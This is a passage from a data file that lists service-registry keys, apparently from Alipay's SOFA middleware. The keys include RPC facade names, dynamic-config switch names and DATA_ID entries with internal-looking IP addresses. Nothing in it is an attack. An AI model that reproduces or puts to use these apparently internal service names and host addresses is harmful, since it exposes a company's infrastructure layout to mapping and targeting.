Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.yearWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.DeltaDwbDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_IFXPOSITION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbindustryomp.common.service.facade.api.merchant.MerchantActionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.RiskValidatePolicyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.backend.api.BackendMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.74.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.xview.conf.drm.XViewConfClientDrm.metadataClientRefreshCycle,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:arulemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditSignSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfbsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.mservice.facade.KoiDrawCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.InstAccountAddFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.biz.platform.task.complainmessage.BizToTaskDataManager:1.0:bizToTaskDataManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.facade.instruction.InstructionQaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.core.service.processor.message.MessageRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_XY_TEST0724#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.service.facade.service.DetectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.changedefense.ChangeDefenseMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTANALYSIS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.biz.risktask.decision.CustomerRiskServiceTRTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.UserInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.DeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.biz.config.accurate.AccurateManager:1.0:accurateGuessYourQuestionManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.org.RealStoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.divide.DivideInstanceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditDelayRepayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.shop.MrchProdShopQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ASTTRANSDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.insproductcore.facade.service.InsFcProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:openbaseadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.deliverToBaseMiniAppGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.inssearch.api.SearchSuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_iotcmgr_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.tradeapcore.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_DAMIN_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshyorg.common.service.facade.api.LayoutFacade:1.0:orgLayoutFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.backup.SchemaRollBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenDiscussionGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.ProtocolEmailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.mng.RecordInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.BizStateResetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:productKey_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.utils.restful.RestfulClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.InsuMarginAssignOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.core.service.dingtalk.DingTalkTimerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.171.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:kingdom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.cfin.loancore.common.service.facade.cf.api.query.CfArgmntInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:airmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcenter.service.facade.accumulate.api.UnifiedLimitAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:imobileappng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.partner.MiniAppPartnerOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.riskItem.RiskItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:test_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.forkJoinPlanArSizeThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.FailoverStatusQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.transformer.TemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.ArAdjustSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.SpProdAttrMapManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lendpofprod.common.service.facade.loanapi.repay.DeferRepayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_YAOWEI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbevaluation.common.service.facade.api.rank.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxMonitorRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.GeoSearchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.zbdmhostDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:irisbizprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbasecore.service.v2.tagrelation.facade.TagRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCMLOANPROD-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.sysparam.SysParamQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.DataStructManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.AppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.spi.service.DeviceCallbackService:1.0:mobilecodec_dycodeCompOpen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.KbCodeTemplateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_SHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorResultScanCacheSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.discount.RtCampRelateDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CERTIFYMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.enterprise.facade.EntGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.asset.AssetArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_YDATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.fundprod.facade.FundCloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exclienttrdcenter.service.facade.api.OrderAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebdistributor.common.facade.service.YebBankTradeAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.asset.service.ReservationAssetOverviewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue50:twolevel2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.OpsChngTraceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mmTreatyFixedEditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.stop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:seaottertwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.activity.facade.task.UserTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.app.configAppLoggerLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.zongList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:openmonitor#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxtrade.common.service.facade.strategy.InternalTradeStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:unirelease@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.point.api.PttransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsocprod.front.service.AIService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.asset.api.InsUserBluePolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:aircoreservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.AccItemSendDrm.apiList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade2.HbProductDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.weibo.BaseOfficialAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frscenter.common.service.facade.api.TenorGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.attachment.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmerchantrisk.biz.shared.publisher.GeneralEventPublisher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.MulStrategyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdContactMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fcrcportal.rcportalDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.platform.facade.BillAttrBelongRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.minicenter.common.service.facade.api.inner.MiniAppInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.acappcore.common.service.facade.buildpack.TechstackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.FeatureLabelOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fop.AbTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.IncomeAccruedProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:taskCreatePunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ContractFacacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskinsight.biz.service.impl.punish.PunishLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.category.api.InsCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.oil.AutoMktOilFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcardcenter.common.service.facade.api.McardItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtTmTransCodeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.asset.facade.AssetClassifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aks.facade.cluster.MinionClusterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.ide.facade.api.IdeFunctionOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:kaleidoscopecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.linku.common.service.facade.secret.SecretFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.payacceptance.PaccPostProcessorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.prodtrans.ProdtransSyncRecordFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.bless.BlessCardTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinstecoprod.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@meshysale#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.airprodTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.commandcenter.service.facade.api.DomainResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.ImgContentFacade:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.PayAsyncRecoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.DiscountConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.invoke.ExterfaceInvokeFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.common.service.facade.order.OrderSettleRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.PageTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.88.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.core.service.drm.AstcQueryDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebillcenter.common.service.facade.EbillBigDataCallBackFacade:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.open.product.ServiceProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.core.config.drm.DrmMigrateRouteSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiCreditBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.VisualizationTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ExecutionQueryFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.v2.api.AgmTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvSignupQualificationService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfpayrcv.facade.api.PaymentEngineManualPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.121.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.cutFlowNoAdmitToPcldStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeDRMConfigureImpl.productUseRateAdjustString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.69.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.58.210.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.110.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d189.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.MApiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fop.SchemaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.DynamicTemplateLibraryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.IndustryFacade:1.0:orgIndustryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bkinfocenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeexprod.tradeexprod_mservice_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_F_ACCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.udataservice.client.RouteClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.FinancialCloudFaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransAccoreSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SEACHPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_PUC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditcore.repay.service.PcreditRepayApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sendResultInfoStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.filex.admin.SystemConfigManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestcore.common.service.facade.service.label.InvestLabelAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.